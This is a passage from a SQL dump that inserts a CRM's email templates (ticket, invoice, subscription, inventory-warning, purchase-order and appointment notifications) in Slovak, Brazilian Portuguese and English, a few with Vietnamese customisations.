(1813, 'subscriptions', 'subscription-payment-requires-action', 'slovak', 'Credit Card Authorization Required - SCA [slovak]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1814, 'invoice', 'invoice-due-notice', 'slovak', 'Invoice Due Notice [slovak]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1815, 'estimate_request', 'estimate-request-submitted-to-staff', 'slovak', 'Estimate Request Submitted (Sent to Staff) [slovak]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1816, 'estimate_request', 'estimate-request-assigned', 'slovak', 'Estimate Request Assigned (Sent to Staff) [slovak]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1817, 'estimate_request', 'estimate-request-received-to-user', 'slovak', 'Estimate Request Received (Sent to User) [slovak]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1818, 'client', 'new-client-created', 'portuguese_br', 'New Contact Added/Registered (Welcome Email) [portuguese_br]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1819, 'invoice', 'invoice-send-to-client', 'portuguese_br', 'Send Invoice to Customer [portuguese_br]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1820, 'ticket', 'new-ticket-opened-admin', 'portuguese_br', 'New Ticket Opened (Opened by Staff, Sent to Customer) [portuguese_br]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1821, 'ticket', 'ticket-reply', 'portuguese_br', 'Ticket Reply (Sent to Customer) [portuguese_br]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1822, 'ticket', 'ticket-autoresponse', 'portuguese_br', 'New Ticket Opened - Autoresponse [portuguese_br]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1823, 'invoice', 'invoice-payment-recorded', 'portuguese_br', 'Invoice Payment Recorded (Sent to Customer) [portuguese_br]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1824, 'invoice', 'invoice-overdue-notice', 'portuguese_br', 'Invoice Overdue Notice [portuguese_br]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1825, 'invoice', 'invoice-already-send', 'portuguese_br', 'Invoice Already Sent to Customer [portuguese_br]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1826, 'ticket', 'new-ticket-created-staff', 'portuguese_br', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [portuguese_br]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1827, 'estimate', 'estimate-send-to-client', 'portuguese_br', 'Send Estimate to Customer [portuguese_br]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1828, 'ticket', 'ticket-reply-to-admin', 'portuguese_br', 'Ticket Reply (Sent to Staff) [portuguese_br]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1829, 'estimate', 'estimate-already-send', 'portuguese_br', 'Estimate Already Sent to Customer [portuguese_br]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1830, 'contract', 'contract-expiration', 'portuguese_br', 'Contract Expiration Reminder (Sent to Customer Contacts) [portuguese_br]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1831, 'tasks', 'task-assigned', 'portuguese_br', 'New Task Assigned (Sent to Staff) [portuguese_br]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1832, 'tasks', 'task-added-as-follower', 'portuguese_br', 'Staff Member Added as Follower on Task (Sent to Staff) [portuguese_br]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1833, 'tasks', 'task-commented', 'portuguese_br', 'New Comment on Task (Sent to Staff) [portuguese_br]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1834, 'tasks', 'task-added-attachment', 'portuguese_br', 'New Attachment(s) on Task (Sent to Staff) [portuguese_br]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1835, 'estimate', 'estimate-declined-to-staff', 'portuguese_br', 'Estimate Declined (Sent to Staff) [portuguese_br]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1836, 'estimate', 'estimate-accepted-to-staff', 'portuguese_br', 'Estimate Accepted (Sent to Staff) [portuguese_br]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1837, 'proposals', 'proposal-client-accepted', 'portuguese_br', 'Customer Action - Accepted (Sent to Staff) [portuguese_br]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1838, 'proposals', 'proposal-send-to-customer', 'portuguese_br', 'Send Proposal to Customer [portuguese_br]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1839, 'proposals', 'proposal-client-declined', 'portuguese_br', 'Customer Action - Declined (Sent to Staff) [portuguese_br]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1840, 'proposals', 'proposal-client-thank-you', 'portuguese_br', 'Thank You Email (Sent to Customer After Accept) [portuguese_br]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1841, 'proposals', 'proposal-comment-to-client', 'portuguese_br', 'New Comment  (Sent to Customer/Lead) [portuguese_br]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1842, 'proposals', 'proposal-comment-to-admin', 'portuguese_br', 'New Comment (Sent to Staff)  [portuguese_br]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1843, 'estimate', 'estimate-thank-you-to-customer', 'portuguese_br', 'Thank You Email (Sent to Customer After Accept) [portuguese_br]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1844, 'tasks', 'task-deadline-notification', 'portuguese_br', 'Task Deadline Reminder - Sent to Assigned Members [portuguese_br]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1845, 'contract', 'send-contract', 'portuguese_br', 'Send Contract to Customer [portuguese_br]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1846, 'invoice', 'invoice-payment-recorded-to-staff', 'portuguese_br', 'Invoice Payment Recorded (Sent to Staff) [portuguese_br]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1847, 'ticket', 'auto-close-ticket', 'portuguese_br', 'Auto Close Ticket [portuguese_br]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1848, 'project', 'new-project-discussion-created-to-staff', 'portuguese_br', 'New Project Discussion (Sent to Project Members) [portuguese_br]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1849, 'project', 'new-project-discussion-created-to-customer', 'portuguese_br', 'New Project Discussion (Sent to Customer Contacts) [portuguese_br]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1850, 'project', 'new-project-file-uploaded-to-customer', 'portuguese_br', 'New Project File(s) Uploaded (Sent to Customer Contacts) [portuguese_br]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1851, 'project', 'new-project-file-uploaded-to-staff', 'portuguese_br', 'New Project File(s) Uploaded (Sent to Project Members) [portuguese_br]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1852, 'project', 'new-project-discussion-comment-to-customer', 'portuguese_br', 'New Discussion Comment  (Sent to Customer Contacts) [portuguese_br]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1853, 'project', 'new-project-discussion-comment-to-staff', 'portuguese_br', 'New Discussion Comment (Sent to Project Members) [portuguese_br]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1854, 'project', 'staff-added-as-project-member', 'portuguese_br', 'Staff Added as Project Member [portuguese_br]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1855, 'estimate', 'estimate-expiry-reminder', 'portuguese_br', 'Estimate Expiration Reminder [portuguese_br]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1856, 'proposals', 'proposal-expiry-reminder', 'portuguese_br', 'Proposal Expiration Reminder [portuguese_br]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1857, 'staff', 'new-staff-created', 'portuguese_br', 'New Staff Created (Welcome Email) [portuguese_br]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1858, 'client', 'contact-forgot-password', 'portuguese_br', 'Forgot Password [portuguese_br]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1859, 'client', 'contact-password-reseted', 'portuguese_br', 'Password Reset - Confirmation [portuguese_br]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1860, 'client', 'contact-set-password', 'portuguese_br', 'Set New Password [portuguese_br]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1861, 'staff', 'staff-forgot-password', 'portuguese_br', 'Forgot Password [portuguese_br]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1862, 'staff', 'staff-password-reseted', 'portuguese_br', 'Password Reset - Confirmation [portuguese_br]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1863, 'project', 'assigned-to-project', 'portuguese_br', 'New Project Created (Sent to Customer Contacts) [portuguese_br]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1864, 'tasks', 'task-added-attachment-to-contacts', 'portuguese_br', 'New Attachment(s) on Task (Sent to Customer Contacts) [portuguese_br]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1865, 'tasks', 'task-commented-to-contacts', 'portuguese_br', 'New Comment on Task (Sent to Customer Contacts) [portuguese_br]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1866, 'leads', 'new-lead-assigned', 'portuguese_br', 'New Lead Assigned to Staff Member [portuguese_br]', 'New lead assigned to you', '{lead_source}', '{companyname} | CRM', '', 0, 0, 0),
(1867, 'client', 'client-statement', 'portuguese_br', 'Statement - Account Summary [portuguese_br]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1868, 'ticket', 'ticket-assigned-to-admin', 'portuguese_br', 'New Ticket Assigned (Sent to Staff) [portuguese_br]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1869, 'client', 'new-client-registered-to-admin', 'portuguese_br', 'New Customer Registration (Sent to admins) [portuguese_br]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1870, 'leads', 'new-web-to-lead-form-submitted', 'portuguese_br', 'Web to lead form submitted - Sent to lead [portuguese_br]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1871, 'staff', 'two-factor-authentication', 'portuguese_br', 'Two Factor Authentication [portuguese_br]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1872, 'project', 'project-finished-to-customer', 'portuguese_br', 'Project Marked as Finished (Sent to Customer Contacts) [portuguese_br]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1873, 'credit_note', 'credit-note-send-to-client', 'portuguese_br', 'Send Credit Note To Email [portuguese_br]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1874, 'tasks', 'task-status-change-to-staff', 'portuguese_br', 'Task Status Changed (Sent to Staff) [portuguese_br]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1875, 'tasks', 'task-status-change-to-contacts', 'portuguese_br', 'Task Status Changed (Sent to Customer Contacts) [portuguese_br]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1876, 'staff', 'reminder-email-staff', 'portuguese_br', 'Staff Reminder Email [portuguese_br]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1877, 'contract', 'contract-comment-to-client', 'portuguese_br', 'New Comment  (Sent to Customer Contacts) [portuguese_br]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1878, 'contract', 'contract-comment-to-admin', 'portuguese_br', 'New Comment (Sent to Staff)  [portuguese_br]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1879, 'subscriptions', 'send-subscription', 'portuguese_br', 'Send Subscription to Customer [portuguese_br]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1880, 'subscriptions', 'subscription-payment-failed', 'portuguese_br', 'Subscription Payment Failed [portuguese_br]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1881, 'subscriptions', 'subscription-canceled', 'portuguese_br', 'Subscription Canceled (Sent to customer primary contact) [portuguese_br]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1882, 'subscriptions', 'subscription-payment-succeeded', 'portuguese_br', 'Subscription Payment Succeeded (Sent to customer primary contact) [portuguese_br]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1883, 'contract', 'contract-expiration-to-staff', 'portuguese_br', 'Contract Expiration Reminder (Sent to Staff) [portuguese_br]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1884, 'gdpr', 'gdpr-removal-request', 'portuguese_br', 'Removal Request From Contact (Sent to administrators) [portuguese_br]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1885, 'gdpr', 'gdpr-removal-request-lead', 'portuguese_br', 'Removal Request From Lead (Sent to administrators) [portuguese_br]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1886, 'client', 'client-registration-confirmed', 'portuguese_br', 'Customer Registration Confirmed [portuguese_br]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1887, 'contract', 'contract-signed-to-staff', 'portuguese_br', 'Contract Signed (Sent to Staff) [portuguese_br]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1888, 'subscriptions', 'customer-subscribed-to-staff', 'portuguese_br', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [portuguese_br]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1889, 'client', 'contact-verification-email', 'portuguese_br', 'Email Verification (Sent to Contact After Registration) [portuguese_br]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1890, 'client', 'new-customer-profile-file-uploaded-to-staff', 'portuguese_br', 'New Customer Profile File(s) Uploaded (Sent to Staff) [portuguese_br]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1891, 'staff', 'event-notification-to-staff', 'portuguese_br', 'Event Notification (Calendar) [portuguese_br]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1892, 'subscriptions', 'subscription-payment-requires-action', 'portuguese_br', 'Credit Card Authorization Required - SCA [portuguese_br]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1893, 'invoice', 'invoice-due-notice', 'portuguese_br', 'Invoice Due Notice [portuguese_br]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(1894, 'estimate_request', 'estimate-request-submitted-to-staff', 'portuguese_br', 'Estimate Request Submitted (Sent to Staff) [portuguese_br]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1895, 'estimate_request', 'estimate-request-assigned', 'portuguese_br', 'Estimate Request Assigned (Sent to Staff) [portuguese_br]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1896, 'estimate_request', 'estimate-request-received-to-user', 'portuguese_br', 'Estimate Request Received (Sent to User) [portuguese_br]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1897, 'inventory_warning', 'inventory-warning-to-staff', 'english', 'Inventory warning (Sent to staff)', 'Inventory warning', 'Hi {staff_name}! <br /><br />This is a inventory warning<br />{<span 12pt=\"\">notification_content</span>}. <br /><br />Regards.', '{companyname} | CRM', NULL, 0, 1, 0),
(1898, 'inventory_warning', 'inventory-warning-to-staff', 'swedish', 'Inventory warning (Sent to staff) [swedish]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1899, 'inventory_warning', 'inventory-warning-to-staff', 'portuguese', 'Inventory warning (Sent to staff) [portuguese]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1900, 'inventory_warning', 'inventory-warning-to-staff', 'turkish', 'Inventory warning (Sent to staff) [turkish]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1901, 'inventory_warning', 'inventory-warning-to-staff', 'bulgarian', 'Inventory warning (Sent to staff) [bulgarian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1902, 'inventory_warning', 'inventory-warning-to-staff', 'dutch', 'Inventory warning (Sent to staff) [dutch]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1903, 'inventory_warning', 'inventory-warning-to-staff', 'russian', 'Inventory warning (Sent to staff) [russian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1904, 'inventory_warning', 'inventory-warning-to-staff', 'greek', 'Inventory warning (Sent to staff) [greek]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1905, 'inventory_warning', 'inventory-warning-to-staff', 'catalan', 'Inventory warning (Sent to staff) [catalan]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1906, 'inventory_warning', 'inventory-warning-to-staff', 'german', 'Inventory warning (Sent to staff) [german]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1907, 'inventory_warning', 'inventory-warning-to-staff', 'chinese', 'Inventory warning (Sent to staff) [chinese]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1908, 'inventory_warning', 'inventory-warning-to-staff', 'vietnamese', 'Inventory warning (Sent to staff) [vietnamese]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1909, 'inventory_warning', 'inventory-warning-to-staff', 'indonesia', 'Inventory warning (Sent to staff) [indonesia]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1910, 'inventory_warning', 'inventory-warning-to-staff', 'french', 'Inventory warning (Sent to staff) [french]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1911, 'inventory_warning', 'inventory-warning-to-staff', 'czech', 'Inventory warning (Sent to staff) [czech]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1912, 'inventory_warning', 'inventory-warning-to-staff', 'romanian', 'Inventory warning (Sent to staff) [romanian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1913, 'inventory_warning', 'inventory-warning-to-staff', 'polish', 'Inventory warning (Sent to staff) [polish]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1914, 'inventory_warning', 'inventory-warning-to-staff', 'ukrainian', 'Inventory warning (Sent to staff) [ukrainian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1915, 'inventory_warning', 'inventory-warning-to-staff', 'persian', 'Inventory warning (Sent to staff) [persian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1916, 'inventory_warning', 'inventory-warning-to-staff', 'japanese', 'Inventory warning (Sent to staff) [japanese]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1917, 'inventory_warning', 'inventory-warning-to-staff', 'spanish', 'Inventory warning (Sent to staff) [spanish]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1918, 'inventory_warning', 'inventory-warning-to-staff', 'italian', 'Inventory warning (Sent to staff) [italian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1919, 'inventory_warning', 'inventory-warning-to-staff', 'slovak', 'Inventory warning (Sent to staff) [slovak]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1920, 'inventory_warning', 'inventory-warning-to-staff', 'portuguese_br', 'Inventory warning (Sent to staff) [portuguese_br]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1921, 'purchase_order', 'purchase-order-to-contact', 'english', 'Purchase Order (Sent to contact)', 'Đơn đặt hàng {po_number} | WIT', '<span> Hello !. </span><br /><br /><span>Ch&uacute;ng t&ocirc;i xin chia sẻ với bạn link th&ocirc;ng tin Đơn h&agrave;ng mua với số {po_number} </span><br /><br /><span><br />Vui l&ograve;ng bấm v&agrave;o link để xem th&ocirc;ng tin: {public_link} </span>', '{companyname} | CRM', '', 0, 1, 0),
(1922, 'appointly', 'appointment-cron-reminder-to-staff', 'english', 'Appointment reminder (Sent to Staff and Attendees)', 'You have an upcoming appointment!', '<span style=\\\"font-size: 12pt;\\\"> Hello {staff_firstname} {staff_lastname} </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> You have an upcoming appointment that is need to be held date {appointment_date} and location {appointment_location}</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><strong>Additional info for your appointment:</strong></span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment scheduled date to start:</strong> {appointment_date}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>You can view this appointment at the following link:</strong> <a href=\"{appointment_admin_url}\">Your appointment URL</a></span><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1923, 'appointly', 'appointment-recurring-to-staff', 'english', 'Appointment recurring (Sent to Staff and Attendees)', 'Recurring appointment was re-created!', '<span style=\\\"font-size: 12pt;\\\"> Hello {staff_firstname} {staff_lastname} </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> Your recurring appointment was recreated with date {appointment_date} and location {appointment_location}</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><strong> Additional info for your appointment:</strong></span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment scheduled date to start:</strong> {appointment_date}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>You can view this appointment at the following link:</strong> <a href=\"{appointment_admin_url}\">Your appointment URL</a></span><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1924, 'appointly', 'appointment-cancelled-to-staff', 'english', 'Appointment cancelled (Sent to Staff and Attendees)', 'Appointment has been cancelled!', '<span style=\\\"font-size: 12pt;\\\"> Hello {staff_firstname} {staff_lastname}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> The appointment that needed to be held on date {appointment_date} and location {appointment_location} with contact {appointment_client_name} is cancelled.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1925, 'appointly', 'appointment-cancelled-to-contact', 'english', 'Appointment cancelled (Sent to Contact)', 'Your appointment has been cancelled!', '<span style=\\\"font-size: 12pt;\\\"> Hello {appointment_client_name}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> The appointment that needed to be held on date {appointment_date} and location {appointment_location} is now cancelled.</span><br /><br /><span style=\\\"font-size:12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1926, 'appointly', 'appointment-cron-reminder-to-contact', 'english', 'Appointment reminder (Sent to Contact)', 'You have an upcoming appointment!', '<span style=\\\"font-size: 12pt;\\\"> Hello {appointment_client_name}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> You have an upcoming appointment that is need to be held date {appointment_date} and location {appointment_location}.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><strong>Additional info for your appointment</strong></span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment scheduled date to start:</strong> {appointment_date}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>You can view this appointment at the following link:</strong> <a href=\"{appointment_public_url}\">Your appointment URL</a></span><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1927, 'appointly', 'appointment-recurring-to-contacts', 'english', 'Appointment recurring (Sent to Contact)', 'Recurring appointment was re-created!', '<span style=\\\"font-size: 12pt;\\\"> Hello {appointment_client_name}. </span><br /><br /><span style=\\\"font-size: 12pt;\\\"> Your recurring appointment was recreated with date {appointment_date} and location {appointment_location}.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><strong>Additional info for your appointment</strong></span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment scheduled date to start:</strong> {appointment_date}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>You can view this appointment at the following link:</strong> <a href=\"{appointment_public_url}\">Your appointment URL</a></span><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1928, 'appointly', 'appointment-approved-to-staff', 'english', 'Appointment approved (Sent to Staff and Atendees)', 'You are added as a appointment attendee!', '<span style=\\\"font-size: 12pt;\\\"> Hello {staff_firstname} {staff_lastname}.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"> You are added as a appointment attendee.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment scheduled date to start:</strong> {appointment_date}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>You can view this appointment at the following link:</strong> <a href=\"{appointment_admin_url}\">Your appointment URL</a></span><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1929, 'appointly', 'appointment-approved-to-contact', 'english', 'Appointment approved (Sent to Contact)', 'Your appointment has been approved!', '<span style=\\\"font-size: 12pt;\\\"> Hello {appointment_client_name}.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"> You appointment has been approved!</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>Appointment scheduled date to start:</strong> {appointment_date}</span><br /><span style=\\\"font-size: 12pt;\\\"><strong>You can keep track of your appointment at the following link:</strong> <a href=\"{appointment_public_url}\">Your appointment URL</a></span><br /><span style=\\\"font-size: 12pt;\\\"><br/>If you have any questions Please contact us for more information.</span><br /><br /><span style=\\\"font-size: 12pt;\\\"><br />Kind Regards</span><br /><br /><span style=\\\"font-size: 12pt;\\\">{email_signature}</span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1930, 'appointly', 'appointment-submitted-to-staff', 'english', 'New appointment request (Sent to Responsible Person)', 'New appointment request via external form!', '<span 12pt=\"\"><span 12pt=\"\">Hello {staff_firstname} {staff_lastname}<br /><br />New appointment request submitted via external form</span>.<br /><br /><span 12pt=\"\"><strong>Appointment Subject:</strong> {appointment_subject}</span><br /><br /><span 12pt=\"\"><strong>Appointment Description:</strong> {appointment_description}</span><br /><br /><span 12pt=\"\"><strong>Appointment requested scheduled start date:</strong> {appointment_date}</span><br /><br /><span 12pt=\"\"><strong>You can view this appointment request at the following link:</strong> <a href=\"{appointment_admin_url}\">{appointment_admin_url}</a></span><br /><br /><br />{companyname}<br />{crm_url}<br /><span 12pt=\"\"></span></span>', '{companyname} | CRM', NULL, 0, 1, 0),
